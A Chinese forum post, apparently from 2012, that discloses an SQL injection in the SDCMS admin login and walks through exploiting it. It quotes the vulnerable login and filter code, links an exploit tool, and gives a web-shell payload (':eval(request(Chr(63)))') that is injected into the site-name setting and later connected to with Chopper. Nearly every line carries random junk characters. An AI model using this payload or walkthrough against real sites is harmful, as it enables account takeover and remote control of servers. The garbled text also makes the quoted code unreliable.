作者:T00LS 鬼哥
; y8 @8 \3 w1 h$ c- q6 |. C7 Y漏洞文件:后台目录/index.asp
/ D# {" @+ s, z1 u! J0 o3 k, o# R# s6 |( @; N& c" Z9 P* _
Sub Check
# n7 y/ o6 m3 ]0 s5 B Dim username,password,code,getcode,Rs
8 @- I8 a1 P; l6 K- y IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub9 v6 J5 h$ ~- Y& N
username=FilterText(Trim(Request.Form("username")),1)
# r4 h; U& f( l6 v' F7 [) [ password=FilterText(Trim(Request.Form("password")),1)% h ]# N) H% r* d8 r2 p
code=Trim(Request.Form("yzm"))
- s, M0 L+ d8 f- r getcode=Session("SDCMSCode")6 ^" |; P7 y c# \
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died1 {0 w! r$ X/ x! C
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
. X9 x0 @- |0 J, b, N4 [$ i8 j IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied$ p; v2 v0 q; c) x
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
6 M9 b2 G2 z% v% r8 w0 I IF username="" or password="" Then; {. P8 z7 V" b
Echo "用户名或密码不能为空"ied
$ h8 \+ r: Q" O" z, h7 x! G Else6 e" {, b: k/ X! U/ _
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
( _4 r0 k" l( ^7 B/ C# Z# S8 K IF Rs.Eof Then
7 m8 k5 s; M/ L3 o AddLog username,GetIp,"登录失败",1
1 W7 h. R" \& G& `. T* R Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
! a9 y( E' o# u( g" h U2 r. F Else
' G" b2 t. h+ H' [4 l Add_Cookies "sdcms_id",Rs(0)( Y& l2 | |8 m" s% H
Add_Cookies "sdcms_name",username
9 M$ l8 y0 m" y) } Add_Cookies "sdcms_pwd",Rs(2)
- c- A. r7 }7 D! E Add_Cookies "sdcms_admin",Rs(3)
0 ]$ w) L( v# k Add_Cookies "sdcms_alllever",Rs(4)
+ O; W' \- O: e$ u" k Add_Cookies "sdcms_infolever",Rs(5)" D9 u& E' ~* p+ @( i/ H* E# j& g
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
# [7 l# Q1 `5 U AddLog username,GetIp,"登录成功",1
- |/ a4 W" ^8 ?; e0 F+ W '自动删除30天前的Log记录
* C+ y8 {& G9 A6 r IF Sdcms_DataType Then6 l1 J3 R1 c: z8 A
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")5 f3 g0 ^9 E1 x9 G, [
Else# q% M [3 N. z- K+ e7 o+ l; _5 i
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
/ {8 C" o1 a7 v% J( I End IF5 u( J( B- E/ a. l. x
Go("sdcms_index.asp")
# _- F Q# g& I# s+ v6 R End IF" X* w X* x2 @2 P# d5 K
Rs.Close
- F w, Y8 n. L+ l6 ~; w Set Rs=Nothing
; ?. f5 E: s5 R: G; J* e# Q- r! M3 k End IF
# {! Z! G& C/ b* ~! s& ~End Sub
+ X; G& a0 s- X5 l! v, d8 u8 t# T% Y
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码1 n, u, x' m% C w- M
/ U5 @( o3 Y( `1 W- C* _Function FilterText(ByVal t0,ByVal t1)4 s8 J4 p4 V+ u; s8 @
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function9 |2 r; t1 Q7 c5 S4 g
t0=Trim(t0)
4 c, {$ I: A) n; K5 {" F Select Case t1
" I" m( X! T. C& d8 I( c: @ Case "1", s, o' D5 K; e& {
t0=Replace(t0,Chr(32),"")
6 F2 s. C, G- C& q t0=Replace(t0,Chr(13),"")
3 o0 s- A9 S7 @ t0=Replace(t0,Chr(10)&Chr(10),"")0 c% M/ s( t& h# D
t0=Replace(t0,Chr(10),""), p7 e( ^6 P8 _4 S) k. v
Case "2"
T6 E. e/ i' Q: {0 X# f t0=Replace(t0,Chr(8),"")'回格: d! ~( w$ q+ n( v4 I/ E
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
0 S! c+ }% S% U# t& I" } t0=Replace(t0,Chr(10),"")'换行, u3 D' I" ^7 B, N
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
2 P; z) Q3 f5 k! @. k+ y t0=Replace(t0,Chr(12),"")'换页: N2 ^/ |( ]6 q
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
: x- p% Q6 I. n$ h# J m4 ?: f t0=Replace(t0,Chr(22),"")
: b( v" c! O& o* c" A s t0=Replace(t0,Chr(32),"")'空格 SPACE
0 y3 F c- h. N ?* K" F' D, q t0=Replace(t0,Chr(33),"")'!4 ~) @& G# i0 S# Y6 o
t0=Replace(t0,Chr(34),"")'"
" i4 u `6 X) y1 @8 ^ t0=Replace(t0,Chr(35),"")'#
# a" h* \; @8 T t0=Replace(t0,Chr(36),"")'$4 g, Z# @& d+ V+ ^. W3 g
t0=Replace(t0,Chr(37),"")'%
3 n l4 W4 x, W t0=Replace(t0,Chr(38),"")'&' _1 ]6 O2 D* R" L% q
t0=Replace(t0,Chr(39),"")''# V Y! ?# r/ {! h6 A4 |: E
t0=Replace(t0,Chr(40),"")'(9 T/ B; X7 A, X* t4 O
t0=Replace(t0,Chr(41),"")')8 W3 b3 J; K9 V N2 ?% V
t0=Replace(t0,Chr(42),"")'*
8 _. t4 k, }8 C ^- ` t0=Replace(t0,Chr(43),"")'+) l! Y" m! Z) l0 R
t0=Replace(t0,Chr(44),"")',, e* w% g- b" w; H. B( o
t0=Replace(t0,Chr(45),"")'-+ K( W3 p1 o& @& K6 O) C
t0=Replace(t0,Chr(46),"")'.
0 S+ b+ C2 W+ s: J- f/ o' F t0=Replace(t0,Chr(47),"")'/
: ~, S( x/ C3 n9 h" K8 l; | t0=Replace(t0,Chr(58),"")':
! Y( K( q$ ~* }% ?; m# d- Y0 F t0=Replace(t0,Chr(59),"")';
0 S7 }, r9 S5 r* z8 o t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>0 U% j* y. R5 `3 t
t0=Replace(t0,Chr(63),"")'?
, z0 z3 l) H6 }! d- `+ Z0 @6 X; S t0=Replace(t0,Chr(64),"")'@$ H% E- _1 r. x6 d/ l" }+ Q) L% Y
t0=Replace(t0,Chr(91),"")'\! K" N7 Z- q6 h! H
t0=Replace(t0,Chr(92),"")'\ K6 m( e. G; Q2 x2 X
t0=Replace(t0,Chr(93),"")']
# i X7 B1 F0 M: n7 W t0=Replace(t0,Chr(94),"")'^
# a) F" T6 A% \ t0=Replace(t0,Chr(95),"")'_- p+ H- e3 X0 y, n9 ?; a1 ?
t0=Replace(t0,Chr(96),"")'`5 ~9 k( U$ }" |% w2 R
t0=Replace(t0,Chr(123),"")'{0 i9 q' A$ C3 V% Y. z9 o0 @0 c; O
t0=Replace(t0,Chr(124),"")'|* F* r+ O8 y3 o1 o w- J
t0=Replace(t0,Chr(125),"")'}6 V. W" G$ f$ {4 }
t0=Replace(t0,Chr(126),"")'~
& @3 l! M; z0 P( W$ r Case Else
% W% M* h" s1 ^) l t0=Replace(t0, "&", "&")( V, z4 w ]+ a3 ~7 }2 I
t0=Replace(t0, "'", "'")
7 |; M: K) Y- P7 i t0=Replace(t0, """", """)
* S' I1 }4 V! {: ] t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">") z& W1 ?7 ?: D& U
End Select
5 p4 |. t {( E/ ]" Q IF Instr(Lcase(t0),"expression")>0 Then7 \) D" E+ Z6 k+ m& [
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
( |0 ?' L( L" B' x* N7 X End If* o5 |8 K8 G8 B! W$ M9 c/ m7 ?: B
FilterText=t0! C2 j2 i* g8 X9 l
End Function
: y. W4 y' S& y' v
: K& S+ Q* U, p( ~/ P) ]! C看到没。直接参数是1 只过滤
, ^- w. c% x2 V, u- E8 ~ t0=Replace(t0,Chr(32)," ")9 r! f/ |8 \: Z: z6 n
t0=Replace(t0,Chr(13),"")9 x; y4 F# |$ `1 a1 N. V- @, X
t0=Replace(t0,Chr(10)&Chr(10),"4 P& c" W+ o2 b, z
")
) ?. _' m8 ~4 X t0=Replace(t0,Chr(10),"$ O# P1 |. p4 s1 }
")2 U1 V* v. Z: R& E8 n5 n8 Z$ I
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
- o- v/ H! _1 [EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
8 [7 R9 s, V2 c" {3 U
3 c) t1 k2 k G t! ~5 d测试:5 {! E' X4 { H J" D3 @
* w( J/ _- q3 Y5 x) J( e9 x; e# j& f; h& e7 ~ W1 s5 k: [4 ^
现在输入工具上验证码,然后点OK
) d. g! \: y8 a7 I n" V2 c, `6 M5 k- d
& F, ~5 @! V" _6 E; ~! O$ C
看到我们直接进入后台管理界面了,呵呵!! R- Z( ^5 y, [) {- p. G3 x$ B
! v, [( z4 O6 V A/ G
0 ^; o3 T( T% ^1 j0 E0 C# G# E2 j3 d# h8 C2 T
这样直接进入后台了。。。。
3 g" ?/ F, Q- o
4 B( W! ?5 i8 z* a * Q; j6 ^; X' L' h5 S
6 O I+ A; V3 y2 qSDCMS提权:
+ w- p( v) K4 w+ H- l1 \
2 L1 Z3 @9 c# X% m方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
! N ^/ R; r; V5 o
$ {3 t' e& F1 o. H* p9 O0 O% ]( {- f) U
# x" A( h1 P! B6 r
OK,现在用菜刀连接下!1 P9 c; x1 n' {+ f- j. e* B5 \
: f* q8 i0 P; e4 U, Y% x
; S7 p* ]8 x5 O$ u: y9 H- ^' h
/ C+ C$ K4 S7 g6 e3 c) Y( [ I ( ~! {$ J( @) p; p6 k- x, C5 t
; `9 y' `8 E, o5 }
|
发表于 2012-11-9 20:57:02
收藏
支持
反对